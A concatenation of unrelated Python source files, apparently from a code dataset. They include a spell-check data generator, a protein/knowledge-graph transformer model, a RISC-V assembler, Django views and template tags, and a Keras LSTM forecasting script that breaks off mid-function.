from tqdm import tqdm
from nltk.tokenize import word_tokenize
SEED = 1337
punctuation = string.punctuation + '1234567890’'
def set_seed(seed = 42, set_torch=True):
random.seed(seed)
np.random.seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
if set_torch:
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
set_seed(SEED)
default_hyperparameters = {
'd_model': 64,
'nhead': 8,
'num_encoder_layers': 4,
'num_decoder_layers': 4,
'dim_feedforward': 256,
'dropout': 0.05,
}
def candidates(word):
"Generate possible spelling corrections for word."
cand = list(set(list(edits1(word)) + list(edits2(word))))
random.shuffle(cand)
cand = cand[:100]+[word]
return cand
def edits1(word):
"All edits that are one edit away from `word`."
letters = 'abcdefghijklmnopqrstuvwxyz '
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [L + R[1:] for L, R in splits if R]
transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R)>1]
replaces = [L + c + R[1:] for L, R in splits if R for c in letters]
inserts = [L + c + R for L, R in splits for c in letters]
return set(deletes + transposes + replaces + inserts)
def edits2(word):
"All edits that are two edits away from `word`."
return set(e2 for e1 in edits1(word) for e2 in edits1(e1))
# Parse arguments
parser = argparse.ArgumentParser(
description="Train the model on dataset",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-m", "--model", help="Model architecture: currently only transformer", default="transformer")
parser.add_argument("-i", "--data-input", type=Path,
help="Specify file with input sequences", required=True)
parser.add_argument("-x", "--hyperparameters", type=json.loads,
help="Specify model hyperparameters", default='{}')
parser.add_argument("-e", "--max-epochs", type=int,
help="Maximum epochs count", default=250)
parser.add_argument("-l", "--log-interval", type=int,
help="Training logging interval", default=503)
parser.add_argument("-c", "--checkpoint-every", type=int,
help="Save checkpoint every N epochs", default=50)
parser.add_argument("--checkpoint-dir", type=Path,
help="Directory where to save checkpoints", default=Path("./checkpoints"))
parser.add_argument("-b", "--batch-size",
help="Batch size", type=int, default=32)
parser.add_argument("--lr", help="Learning rate", type=float, default=1e-3)
parser.add_argument("-d", "--device", help="Device: CPU or GPU", default="cuda")
args = parser.parse_args()
try:
shutil.rmtree('examples/spell-check/')
except:
pass
os.mkdir('examples/spell-check/')
f = open(args.data_input)
data_input = f.read().split('\n')[:-1]
f.close()
data = []
punct = string.punctuation
for d in data_input:
d = ''.join([c for c in d if not c in punct])
data += d.split()
X = []
y = []
for d in tqdm(data):
cand = list(candidates(d))
X += [d]*len(cand)
y += cand
with open('examples/spell-check/input.txt', 'w', encoding='utf-8') as f:
f.write('\n'.join(X))
with open('examples/spell-check/target.txt', 'w', encoding='utf-8') as f:
f.write('\n'.join(y)) |
996,835 | a8333756ca8a2856aefe89a4af6986e9dc3f0845 | # -*- coding: utf-8 -*-
"""ProtSTonKGs model architecture components."""
from __future__ import annotations
import logging
from dataclasses import dataclass
from functools import lru_cache
from typing import Optional
import torch
from torch import nn
from transformers import (
BertModel,
BigBirdConfig,
BigBirdForPreTraining,
BigBirdTokenizer,
)
from transformers.models.big_bird.modeling_big_bird import (
BigBirdForPreTrainingOutput,
BigBirdLMPredictionHead,
)
from stonkgs.constants import (
NLP_MODEL_TYPE,
PROTSTONKGS_MODEL_TYPE,
PROT_EMBEDDINGS_PATH,
PROT_SEQ_MODEL_TYPE,
)
from stonkgs.models.kg_baseline_model import prepare_df
# Initialize logger
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
@dataclass
class BigBirdForPreTrainingOutputWithPooling(BigBirdForPreTrainingOutput):
"""Overriding the BigBirdForPreTrainingOutput class to further include the pooled output."""
pooler_output: Optional[torch.FloatTensor] = None
class ProtSTonKGsPELMPredictionHead(BigBirdLMPredictionHead):
"""Custom masked protein, entity and language modeling (PELM) head for proteins, entities and text tokens."""
def __init__(
self,
config,
kg_start_idx: int = 768,
prot_start_idx: int = 1024,
):
"""Initialize the ELM head based on the (hyper)parameters in the provided BertConfig."""
super().__init__(config)
# Initialize the KG and protein part start indices
self.kg_start_idx = kg_start_idx
self.prot_start_idx = prot_start_idx
# There are three different "decoders":
# 1. The text part of the sequence that is projected onto the dimension of the text vocabulary index
# 2. The KG part of the sequence that is projected onto the dimension of the kg vocabulary index
# 3. The protein sequence part that is projected onto the dimension of the protein vocabulary index
# 1. Text decoder
self.text_decoder = nn.Linear(config.hidden_size, config.lm_vocab_size, bias=False)
# 2. KG/Entity decoder
self.entity_decoder = nn.Linear(config.hidden_size, config.kg_vocab_size, bias=False)
# 3. Protein decoder
self.prot_decoder = nn.Linear(config.hidden_size, config.prot_vocab_size, bias=False)
# Set the biases differently for the decoder layers
self.text_bias = nn.Parameter(torch.zeros(config.lm_vocab_size))
self.entity_bias = nn.Parameter(torch.zeros(config.kg_vocab_size))
self.prot_bias = nn.Parameter(torch.zeros(config.prot_vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.text_bias = self.text_bias
self.decoder.entity_bias = self.entity_bias
self.decoder.prot_bias = self.prot_bias
def forward(self, hidden_states):
"""Map hidden states to values for the text (1st part), kg (2nd part) and protein vocabs (3rd part)."""
# Common transformations (dense layer, layer norm + activation function) performed on text, KG and protein data
# transform is initialized in the parent BigBirdLMPredictionHead class
hidden_states = self.transform(hidden_states)
# The first part is processed with the text decoder, the second with the entity decoder, and the third with the
# protein decoder to map to the text, kg, and protein vocab size, respectively
text_hidden_states_to_vocab = self.text_decoder(hidden_states[:, : self.kg_start_idx])
ent_hidden_states_to_kg_vocab = self.entity_decoder(
hidden_states[:, self.kg_start_idx : self.prot_start_idx]
)
prot_hidden_states_to_prot_vocab = self.prot_decoder(
hidden_states[:, self.prot_start_idx :]
)
return (
text_hidden_states_to_vocab,
ent_hidden_states_to_kg_vocab,
prot_hidden_states_to_prot_vocab,
)
class ProtSTonKGsForPreTraining(BigBirdForPreTraining):
"""Create the pre-training part of the ProtSTonKGs model based, text and KG and protein sequence embeddings."""
def __init__(
self,
config, # the config is loaded from scratch later on anyways
protstonkgs_model_type: str = PROTSTONKGS_MODEL_TYPE,
lm_model_type: str = NLP_MODEL_TYPE,
lm_vocab_size: int = 28996,
prot_start_idx: int = 1024,
prot_model_type: str = PROT_SEQ_MODEL_TYPE,
prot_vocab_size: int = 30,
kg_start_idx: int = 768,
kg_embedding_dict_path: str = PROT_EMBEDDINGS_PATH,
):
"""Initialize the model architecture components of ProtSTonKGs.
The Transformer operates on a concatenation of [text, KG, protein]-based input sequences.
:param config: Required for automated methods such as .from_pretrained in classes that inherit from this one
:param protstonkgs_model_type: The type of Transformer used to construct ProtSTonKGs.
:param lm_model_type: The type of (hf) model used to generate the initial text embeddings.
:param lm_vocab_size: Vocabulary size of the language model backbone.
:param kg_start_idx: The index at which the KG random walks start (and the text ends).
:param kg_embedding_dict_path: The path specification for the node2vec embeddings used for the KG data.
:param prot_start_idx: The index at which the protein sequences start (and the KG part ends).
:param prot_model_type: The type of (hf) model used to generate the initial protein sequence embeddings.
:param prot_vocab_size: Vocabulary size of the protein backbone.
"""
# Initialize the KG dict from the file here, rather than passing it as a parameter, so that it can
# be loaded from a checkpoint
kg_embedding_dict = prepare_df(kg_embedding_dict_path)
# Initialize the BigBird config for the model architecture
config = BigBirdConfig.from_pretrained(protstonkgs_model_type)
# Use gradient checkpointing to save memory at the expense of speed
config.update({"gradient_checkpointing": True})
# Add the number of KG entities to the default config of a standard BigBird model
config.update({"lm_vocab_size": lm_vocab_size})
# Add the number of KG entities to the default config of a standard BigBird model
config.update({"kg_vocab_size": len(kg_embedding_dict)})
# Add the protein sequence vocabulary size to the default config as well
config.update({"prot_vocab_size": prot_vocab_size})
# Initialize the underlying LongformerForPreTraining model that will be used to build the STonKGs
# Transformer layers
super().__init__(config)
# Initialize the three backbones for generating the initial embeddings for the three modalities (text, KG, prot)
# 1. LM backbone for text (pre-trained BERT-based model to get the initial embeddings)
# based on the specified protstonkgs_model_type (e.g. BioBERT)
self.lm_backbone = BertModel.from_pretrained(lm_model_type)
# 2. Prot backbone for protein sequences (e.g. ProtBERT)
# do_lower_case is required, see example in https://huggingface.co/Rostlab/prot_bert
self.prot_backbone = BertModel.from_pretrained(prot_model_type)
self.prot_start_idx = prot_start_idx
# Initialize the ProtSTonKGs tokenizer
self.protstonkgs_tokenizer = BigBirdTokenizer.from_pretrained(protstonkgs_model_type)
# In order to initialize the KG backbone: First get the separator, mask and unknown token ids from the
# ProtSTonKGs model base (BigBird)
self.sep_id = self.protstonkgs_tokenizer.sep_token_id
self.mask_id = self.protstonkgs_tokenizer.mask_token_id
self.unk_id = self.protstonkgs_tokenizer.unk_token_id
# 3. KG backbone for KG entities (pretrained node2vec model)
# Get numeric indices for the KG embedding vectors except for the sep, unk, mask ids which are reserved for the
# LM [SEP] embedding vectors (see below)
numeric_indices = list(range(len(kg_embedding_dict) + 3))
# Keep the numeric indices of the special tokens free, don't put the kg embeds there
for special_token_id in [self.sep_id, self.mask_id, self.unk_id]:
numeric_indices.remove(special_token_id)
# Generate numeric indices for the KG node names (iterating .keys() is deterministic)
self.kg_idx_to_name = {i: key for i, key in zip(numeric_indices, kg_embedding_dict.keys())}
# Initialize KG index to embeddings based on the provided kg_embedding_dict
self.kg_backbone = {
i: torch.tensor(kg_embedding_dict[self.kg_idx_to_name[i]]).to(self.lm_backbone.device)
for i in self.kg_idx_to_name.keys()
}
self.kg_start_idx = kg_start_idx
# Add the MASK, SEP and UNK (LM backbone) embedding vectors to the KG backbone so that the labels are correctly
# identified in the loss function later on
# [0][0][0] is required to get the shape from batch x seq_len x hidden_size to hidden_size
with torch.no_grad():
for special_token_id in [self.sep_id, self.mask_id, self.unk_id]:
self.kg_backbone[special_token_id] = self.lm_backbone(
torch.tensor([[special_token_id]]).to(self.device),
)[0][0][0]
# Override the standard MLM head: In the underlying BigBirdForPreTraining model, change the MLM head to a
# custom ProtSTonKGsELMPredictionHead so that it can be used on the concatenated text/entity/prot sequence input
self.cls.predictions = ProtSTonKGsPELMPredictionHead(
config,
kg_start_idx=kg_start_idx,
prot_start_idx=prot_start_idx,
)
# Freeze the parameters of the LM and Prot backbones so that they're not updated during training
# (We only want to train the ProtSTonKGs Transformer layers + prot to hidden linear layer)
for backbone in [self.lm_backbone, self.prot_backbone]:
for param in backbone.parameters():
param.requires_grad = False
# Add another layer that transforms the hidden size of the protein model onto the ProtSTonKGs hidden size
self.prot_to_lm_hidden_linear = nn.Linear(
self.prot_backbone.config.hidden_size,
self.config.hidden_size,
)
@classmethod
@lru_cache(maxsize=32)
def from_default_pretrained(cls, **kwargs) -> ProtSTonKGsForPreTraining:
"""Get the default pre-trained STonKGs model."""
return cls.from_pretrained("stonkgs/protstonkgs", **kwargs)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
masked_lm_labels=None,
ent_masked_lm_labels=None,
prot_masked_lm_labels=None,
return_dict=None,
head_mask=None,
):
"""Perform one forward pass for a given sequence of text_input_ids + ent_input_ids + prot_input_ids.
Due to having more than two parts (and a RoBERTa base in the default BigBird model), the NSP objective is
omitted in this forward function.
:param input_ids: Concatenation of text + KG (random walk) + protein sequence embeddings
:param attention_mask: Attention mask of the combined input sequence
:param token_type_ids: Token type IDs of the combined input sequence
:param masked_lm_labels: Masked LM labels for only the text part
:param ent_masked_lm_labels: Masked entity labels for only the KG part
:param prot_masked_lm_labels: Masked protein labels for only the protein part
:param return_dict: Whether the output should be returned as a dict or not
:param head_mask: Used to cancel out certain heads in the Transformer
:return: Loss, prediction_logits in a LongformerForPreTrainingOutputWithPooling format
"""
# No backpropagation is needed for getting the initial embeddings from the backbones
with torch.no_grad():
# 1. Use the LM backbone to get the pre-trained token embeddings
# batch x number_text_tokens x hidden_size
# The first element of the returned tuple from the LM backbone forward() pass is the sequence of hidden
# states
text_embeddings = torch.cat(
[
self.lm_backbone(
input_ids[
:, i * (self.kg_start_idx // 3) : (i + 1) * (self.kg_start_idx // 3)
]
)[0]
for i in range(3)
],
dim=1,
)
# 2. Use the KG backbone to obtain the pre-trained entity embeddings
# batch x number_kg_tokens x hidden_size
ent_embeddings = torch.stack(
[
# for each numeric index in the random walks sequence: get the embedding vector from the KG backbone
torch.stack([self.kg_backbone[i.item()] for i in j])
# for each example in the batch: get the random walks sequence
for j in input_ids[:, self.kg_start_idx : self.prot_start_idx]
],
)
# 3. Use the Prot backbone to obtain the pre-trained entity embeddings
# batch x number_prot_tokens x prot_hidden_size (prot_hidden_size != hidden_size)
prot_embeddings_original_dim = self.prot_backbone(input_ids[:, self.prot_start_idx :])[
0
]
# Additional layer to project prot_hidden_size onto hidden_size
prot_embeddings = self.prot_to_lm_hidden_linear(prot_embeddings_original_dim)
# Concatenate token, KG and prot embeddings obtained from the LM, KG and prot backbones and cast to float
# batch x seq_len x hidden_size
inputs_embeds = (
torch.cat(
[
text_embeddings,
ent_embeddings.to(text_embeddings.device),
prot_embeddings.to(text_embeddings.device),
],
dim=1,
)
.type(torch.FloatTensor)
.to(self.device)
)
# Get the hidden states from the basic ProtSTonKGs Transformer layers
# batch x seq_len x hidden_size
outputs = self.bert(
inputs_embeds=inputs_embeds,
attention_mask=attention_mask,
return_dict=None,
)
# batch x seq_len x hidden_size
# sequence_output, pooled_output = outputs.last_hidden_state, outputs.pooler_output
sequence_output, pooled_output = outputs[:2]
# Generate the prediction scores (mapping to text and entity vocab sizes + NSP) for the training objectives
# prediction_scores = Text MLM, entity "MLM" and protein "MLM" scores
prediction_scores, _ = self.cls(sequence_output, pooled_output)
# The custom STonKGsELMPredictionHead returns a triple of prediction scores for tokens, entities,
# and protein sequences, respectively
(
token_prediction_scores,
entity_predictions_scores,
prot_predictions_scores,
) = prediction_scores
# Calculate the loss
total_loss = None
if (
masked_lm_labels is not None
and ent_masked_lm_labels is not None
and prot_masked_lm_labels is not None
):
loss_fct = nn.CrossEntropyLoss()
# 1. Text-based MLM
masked_lm_loss = loss_fct(
token_prediction_scores.view(-1, self.config.lm_vocab_size),
masked_lm_labels.view(-1),
)
# 2. Entity-based masked "language" (entity) modeling
ent_masked_lm_loss = loss_fct(
entity_predictions_scores.view(-1, self.config.kg_vocab_size),
ent_masked_lm_labels.view(-1),
)
# 3. Protein-based masked "language" (entity) modeling
prot_masked_lm_loss = loss_fct(
prot_predictions_scores.view(-1, self.config.prot_vocab_size),
prot_masked_lm_labels.view(-1),
)
# Total loss = the sum of the individual training objective losses
total_loss = masked_lm_loss + ent_masked_lm_loss + prot_masked_lm_loss
if not return_dict:
output = prediction_scores + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return BigBirdForPreTrainingOutputWithPooling(
loss=total_loss,
prediction_logits=prediction_scores,
hidden_states=sequence_output,
attentions=outputs.attentions,
pooler_output=pooled_output,
)
|
996,836 | 0043280a430bdf989b4a829aeea0d46d670b35bc | #-*- coding: utf-8 -*-
#https://habrahabr.ru/post/280238/
#http://www.stoloto.ru/ruslotto/game
#-*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import sys
#import lxml
#import requests
#try:
#f=open('/home/user/work/parsers/lot/raw4.html','r')
#f=open('raw3.html','r', encoding='utf-8')
f=open('raw4.html','r')
#except IOError:
# sys.exit("Durak takoi")
s=f.read()
soup = BeautifulSoup(s,'html.parser')
tr_class = soup.find('tr',{'class': 'numbers'}).select("td")
var = soup.title
ss=soup.find_all('tr',{'class': 'numbers'}) #ss is a list of all strings with numbers (20 tickets with 6 strings=120)
print ('\n')
print('first element in list')
print (ss[0])
print ('\n')
print ('ss type is')
print (type(ss))
print len(ss)
print (ss[1])
print('\n')
print('soup.title.string: ')
print(soup.title.string)
print('\n')
print("var.encode('utf-8')")
print(var.encode('utf-8'))
print('\n')
print('trying to open output_file')
output_file=open('120.txt','a')
#output_file.write(str(ss))
for i in range(len(ss)):
print(ss[i])
#print('\n')
#stri=str(i)
#print stri
output_file.write(str((ss[i])))
output_file.write('\n')
output_file.close()
print('Writing complete')
#tr_class = soup.find_next('tr',{'class': 'numbers'})#.select("td")
'''
res=[]
for item in tr_class:
x=str(item)[4:-5]
if x!='': res.append(x)
print('res type: ',res,'\n') #это список спарсеных значений
print('res type: ',type(res),'\n')
##Тут мы запоняем словарь ключами 1-90 и нулевыми значениями
my_dict={}
my_dict.items
keys=[]
for i in range(1,91):
keys.append(i)
my_dict[keys[i-1]]=0
#print(my_dict)
#Тут мы деламе другую херню
for j in res:
j=int(j)
my_dict[j]=my_dict.get(j)+1
print(my_dict)
'''
|
996,837 | 0b977a4dc33c23f2edec69fd3b8277022bb7436e | a = [1,3,4,5]
print(a.index(3))
print(a[1:])
# def maxSubArray(nums):
# f = [nums[0]]
# for i in range(1, len(nums)):
# f.append(max((f[-1]+nums[i]), nums[i]))
# print(f)
# return max(f)
# maxSubArray(a) |
996,838 | 2ef516b223f7dc502ee78a21a33bbc7455e0dd50 | num_string = input('Input number: ')
print(int(num_string))
print(float(num_string))
|
996,839 | dfd120591734b9e834c681a74212c13d1423d21c | r_type = {}
r_type["add"] = {}
r_type["add"]["opcode"] = "0110011"
r_type["add"]["funct3"] = "000"
r_type["add"]["funct7"] = "0000000"
r_type["sll"] = {}
r_type["sll"]["opcode"] = "0110011"
r_type["sll"]["funct3"] = "001"
r_type["sll"]["funct7"] = "0000000"
r_type["srl"] = {}
r_type["srl"]["opcode"] = "0110011"
r_type["srl"]["funct3"] = "101"
r_type["srl"]["funct7"] = "0000000"
r_type["xor"] = {}
r_type["xor"]["opcode"] = "0110011"
r_type["xor"]["funct3"] = "100"
r_type["xor"]["funct7"] = "0000000"
r_type["mul"] = {}
r_type["mul"]["opcode"] = "0110011"
r_type["mul"]["funct3"] = "000"
r_type["mul"]["funct7"] = "0000001"
i_type = {}
i_type["addi"] = {}
i_type["addi"]["opcode"] = "0010011"
i_type["addi"]["funct3"] = "000"
i_type["slli"] = {}
i_type["slli"]["opcode"] = "0010011"
i_type["slli"]["funct3"] = "001"
i_type["srli"] = {}
i_type["srli"]["opcode"] = "0010011"
i_type["srli"]["funct3"] = "101"
i_type["ori"] = {}
i_type["ori"]["opcode"] = "0010011"
i_type["ori"]["funct3"] = "110"
#i_type["ori"]["shift"] = "000000"
i_type["andi"] = {}
i_type["andi"]["opcode"] = "0010011"
i_type["andi"]["funct3"] = "111"
#i_type["andi"]["shift"] = "000000"
b_type = {}
b_type["beq"] = {}
b_type["beq"]["opcode"] = "1100011"
b_type["beq"]["funct3"] = "000"
b_type["bne"] = {}
b_type["bne"]["opcode"] = "1100011"
b_type["bne"]["funct3"] = "001"
registers = {}
registers["zero"] = 0
registers["ra"] = 1
registers["sp"] = 2
registers["gp"] = 3
registers["tp"] = 4
registers["t0"] = 5
registers["t1"] = 6
registers["t2"] = 7
registers["s0"] = 8
registers["fp"] = 8
registers["s1"] = 9
registers["a0"] = 10
registers["a1"] = 11
registers["a2"] = 12
registers["a3"] = 13
registers["a4"] = 14
registers["a5"] = 15
registers["a6"] = 16
registers["a7"] = 17
registers["s2"] = 18
registers["s3"] = 19
registers["s4"] = 20
registers["s5"] = 21
registers["s6"] = 22
registers["s7"] = 23
registers["s8"] = 24
registers["s9"] = 25
registers["s10"] = 26
registers["s11"] = 27
registers["t3"] = 28
registers["t4"] = 29
registers["t5"] = 30
registers["t6"] = 31
registers["x0"] = 0
registers["x1"] = 1
registers["x2"] = 2
registers["x3"] = 3
registers["x4"] = 4
registers["x5"] = 5
registers["x6"] = 6
registers["x7"] = 7
registers["x8"] = 8
registers["x9"] = 9
registers["x10"] = 10
registers["x11"] = 11
registers["x12"] = 12
registers["x13"] = 13
registers["x14"] = 14
registers["x15"] = 15
registers["x16"] = 16
registers["x17"] = 17
registers["x18"] = 18
registers["x19"] = 19
registers["x20"] = 20
registers["x21"] = 21
registers["x22"] = 22
registers["x23"] = 23
registers["x24"] = 24
registers["x25"] = 25
registers["x26"] = 26
registers["x27"] = 27
registers["x28"] = 28
registers["x29"] = 29
registers["x30"] = 30
registers["x31"] = 31
def padZeros(binStr, size):
while len(binStr) < size:
binStr = "0" + binStr
return binStr
def getBinFromBase10(register):
return str(bin(registers[register]))[2:]
def getMachineCode(statement):
if statement.find(":"):
statement = statement[statement.find(":") + 1:].strip()
command = statement[ : statement.find(" ")]
regs = statement[ statement.find(" ") : ].split(",")
for i in range(len(regs)):
regs[i] = regs[i].strip()
machine_code = ""
if command in r_type:
f7 = r_type[command]["funct7"]
rs2 = getBinFromBase10(regs[2])
rs1 = getBinFromBase10(regs[1])
rd = getBinFromBase10(regs[0])
f3 = r_type[command]["funct3"]
opcode = r_type[command]["opcode"]
rs2 = padZeros(rs2, 5)
rs1 = padZeros(rs1, 5)
rd = padZeros(rd, 5)
machine_code = f7 + rs2 + rs1 + f3 + rd + opcode
machine_code = hex(int(machine_code, 2))
elif command in i_type:
immd = regs[2]
immd = (bin(int(immd)&0b111111111111)).replace("-0b", "")
immd = str(immd)
immd = immd.replace("0b", "")
rs1 = getBinFromBase10(regs[1])
f3 = i_type[command]["funct3"]
rd = getBinFromBase10(regs[0])
opcode = i_type[command]["opcode"]
immd = padZeros(immd, 12)
rs1 = padZeros(rs1, 5)
rd = padZeros(rd, 5)
machine_code = immd + rs1 + f3 + rd + opcode
machine_code = hex(int(machine_code, 2))
elif command in b_type:
immd = regs[2]
immd = bin(int(immd)&0b1111111111111)
immd = str(immd)
immd = immd.replace("-0b", "")
immd = immd.replace("0b", "")
immd = padZeros(immd, 13)
rs2 = getBinFromBase10(regs[1])
rs1 = getBinFromBase10(regs[0])
f3 = b_type[command]["funct3"]
opcode = b_type[command]["opcode"]
rs2 = padZeros(rs2, 5)
rs1 = padZeros(rs1, 5)
machine_code = immd[0] + immd[2:8] + rs2 + rs1 + f3 + immd[8:12] + immd[1] + opcode
machine_code = hex(int(machine_code, 2))
machine_code = str(machine_code)[2:]
machine_code = padZeros(machine_code, 8)
machine_code = "0x" + machine_code
return machine_code
if __name__ == "__main__":
with open("test_code.s", "r") as f:
while True:
statement = f.readline()
if not statement:
break
print(getMachineCode(statement))
|
996,840 | a8f8b931c2b2bf87b51dff4e099a69ead98f3637 | default_app_config = 'algorithm.apps.AlgorithmConfig'
|
996,841 | 343d30726daac5e552a2de410c7e6f65ae352e51 | #for extracting specific content from tsv files
import csv
#cols is a list of numbers which specify which columns should be extracted
def extractColumns(path, cols, name):
with open(path, 'r') as tsvin, open(name, 'w') as t:
tsvin = csv.reader(tsvin, delimiter='\t')
tsvout = csv.writer(t, delimiter='\t')
for row in tsvin:
rowNew = []
for col in cols:
rowNew.append(row[col])
tsvout.writerow(rowNew)
extractColumns('zh-wiki-preprocessed-20180110.tsv', [0,2], 'zh-kanji.tsv') |
996,842 | 9d90940de1cee65dffa97ac35dea54b6b3357aa5 | # -*- coding: utf-8 -*-
#
# This file is part of compono released under the Apache 2 license.
# See the NOTICE for more information.
from django.conf import Settings
from django.template import Library, Node, Template, TemplateSyntaxError
from mtcompono.models import Page, Type
register = Library()
class ListTypeNode(Node):
def __init__(self, type_name):
self.type_name = type_name
def render(self, context):
t = Type.by_name(self.type_name)
if not t:
if settings.DEBUG:
return _("[%s n'existe pas]" % self.type_name)
else:
return ''
items = Page.by_type(t._id)
output = ''
try:
tpl = Template(t.templates['list'])
context.update({"items": items})
output = tpl.render(context)
except TemplateSyntaxError, e:
if settings.DEBUG:
return _("[Erreurs de syntaxe: %s]" % e)
else:
return ''
return output
def list_type(parser, token):
bits = token.contents.split()
if len(bits) < 2:
raise TemplateSyntaxError(_("'list_type' tag nécessite au moins un"
" argument: le nom du type"))
return ListTypeNode(bits[1])
list_type = register.tag(list_type)
|
996,843 | 46627acccbff0c29473e2dbcd9c23f93a368ac96 | #!/usr/local/bin/python3
def fib(n):
arr = [0, 1]
for i in range(2,n+1):
arr.append(arr[i-1] + arr[i-2])
#print(arr)
return arr[n]
#print(' '.join([str(fib(x)) for x in range(5)]))
#print (list(map(lambda x: fib(int(x))**3, [i for i in range(int(input()))])))
#print (list(map(lambda x: x**3, [fib(i) for i in range(int(input()))])))
print (list([fib(i)**3 for i in range(int(input()))]))
|
996,844 | 3bc159ca0bf99c9916b53007f87275c80bc63be4 | from django.shortcuts import render, get_object_or_404
from .models import Listing
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from .choices import price_choices, bedroom_choices, state_choices
# Create your views here.
def index(requests):
listings = Listing.objects.order_by('-list_date').filter(is_published=True)
paginator = Paginator(listings, 6)
page = requests.GET.get('page')
paged_listings = paginator.get_page(page)
context = {'listings': paged_listings}
return render(requests, 'listings/listings.html', context)
def listing(requests, listing_id):
listing = get_object_or_404(Listing, pk=listing_id)
context = {'listing': listing}
return render(requests, 'listings/listing.html', context)
def search(requests):
queryset_list = Listing.objects.order_by('-list_date')
# Keywords
if 'keywords' in requests.GET:
keywords = requests.GET['keywords']
if keywords:
queryset_list = queryset_list.filter(description__icontains=keywords)
# City
if 'city' in requests.GET:
city = requests.GET['city']
if city:
queryset_list = queryset_list.filter(city__iexact=city)
#state
if 'state' in requests.GET:
state = requests.GET['state']
if state:
queryset_list = queryset_list.filter(state__iexact=state)
#Bedrooms
if 'bedrooms' in requests.GET:
bedrooms = requests.GET['bedrooms']
if bedrooms:
queryset_list = queryset_list.filter(bedrooms__lte=bedrooms)
#Max price
if 'price' in requests.GET:
price = requests.GET['price']
if price:
queryset_list = queryset_list.filter(price__lte=price)
context = {'state_choices': state_choices,
'bedroom_choices': bedroom_choices,
'price_choices': price_choices,
'listings': queryset_list,
'values': requests.GET}
return render(requests, 'listings/search.html', context)
|
996,845 | 660c50b826aab7ae0f0456702e4a238ecae59923 | # Generated by Django 2.0.4 on 2020-11-20 19:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_auto_20201120_1632'),
]
operations = [
migrations.RenameField(
model_name='tracker',
old_name='route',
new_name='lat',
),
migrations.AddField(
model_name='tracker',
name='long',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
|
996,846 | 1d08d358e2f1674fa2045e33fce057e15f75a358 | import pandas as pd
from scipy.interpolate import interp1d
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.layers.advanced_activations import LeakyReLU
def sub_Sampler(sample, subSampleLength):
'''
Pass a window of size 1 x sampleLength
over the data and return every chunk
'''
if subSampleLength <= 0:
print("subSampleLength must be greater than or equal to 0")
return -1
#i is lower bound, j is upper bound
i = 0
j = subSampleLength
fullSampleLength = len(sample)
if subSampleLength > fullSampleLength:
print("subSampleLength provided was longer than the sample itself")
return -1
#move the window along the sample and save every sub sample
subSamples = []
while j <= fullSampleLength:
subSamples.append(sample[i:j])
i += 1
j += 1
return np.array(subSamples)
def read_Data(sampleLength=120, trainSplit=0.9):
'''
read in the data provided in the csv file
return train and test data
sampleLength controls how long each sample fed to the RNN will be
trainSplit is a percentage for how much data will be used for training
'''
f = pd.read_csv("passenger-miles-mil-flown-domest.csv")
#don't need month and year, only need the data to be in the right order
f = f.drop("Month",1)
#get all the values for the number of domestic flight miles
Y = f.as_matrix(
columns=["Passenger miles (Mil) flown domestic U.K. Jul. ?62-May ?72"])\
.flatten()
#set up X axis
length = len(Y)
X = np.linspace(0, length-1, num=length, endpoint=True)
#set up interpolation function to provide more data to the network
f = interp1d(X, Y, kind='cubic', copy=False)
#n is how many steps between each integer
#for example, setting to 10 produces values [0, 0.1, 0.2, 0.3, 0.4, ...]
#setting to 2 produces [0, 0.5, 1, 1.5, 2, ...]
n=10
newX = np.linspace(0, length-1, num=(length*n)-(n-1), endpoint=True)
#interpolate
newY = f(newX)
#one way of normalizing
#inX = (newY-np.mean(newY))/np.std(newY)
#another way of normalizing
inX = newY/np.max(newY)
#ensure all samples are of size "sampleLength"
subSamples = sub_Sampler(inX, sampleLength)
#error checking for the return of subSamples
if type(subSamples) == int:
if subSamples == -1:
sys.exit(1)
elif subSamples.shape[0] == 0:
sys.exit(1)
#split into training data and testing data
split = int(trainSplit*subSamples.shape[0])
trainingData = subSamples[:split, :]
#ensure randomness
np.random.shuffle(trainingData)
#yTrain is the last value of each of the samples and xTrain is the series
#leading up to the last value (which is going to be predicted)
xTrain = trainingData[:, :-1]
yTrain = trainingData[:, -1]
#testing data for evaluating the generalizability of the model
xTest = subSamples[split:, :-1]
yTest = subSamples[split:, -1]
#reshape to be accepted by the network
xTrain = np.reshape(xTrain, (xTrain.shape[0], xTrain.shape[1], 1))
xTest = np.reshape(xTest, (xTest.shape[0], xTest.shape[1], 1))
return xTrain, yTrain, xTest, yTest
def RNN(layers=[1,10,10,1], dropoutPercent=0.2, opt="Nadam", lossFunc="mse",
leakyAlpha=0.3):
'''
takes layers and builds an RNN in the same shape, returns the model
if layers = [1, 20, 40, 1]
then there's 1 input into the first LSTM which has 20 units
those are then fed into a LSTM of 40 units, final output has size 1
dropoutPercent - the percent of nodes ignored from the previous layer
opt - optimizer, provide any of the accepted optimizer strings for keras
lossFunc - the loss function, provide any of the accepted loss strings for
keras
leakyAlpha - the learning rate for the leakyRelu layer learning how leaky
it should be
'''
#using the Keras Sequential model
m = Sequential()
#add the first LSTM, (separated as it needs an input shape)
m.add(LSTM(layers[1],
return_sequences=True,
input_shape=(None, layers[0])))
#apply dropout to help prevent overfitting
m.add(Dropout(dropoutPercent))
#add all but the last of the LSTM layers
for i in range(2, len(layers) - 2):
m.add(LSTM(
layers[i],
return_sequences=True))
m.add(Dropout(dropoutPercent))
#need return sequences to be false in order to have a final prediction
m.add(LSTM(
layers[-2],
return_sequences=False))
m.add(Dropout(dropoutPercent))
#fully connected layer, then a leakyReLU activation function to allow
#some gradient signal to pass through even when the gradient is less
#than 0, prevent dead neurons
m.add(Dense(layers[-1]))
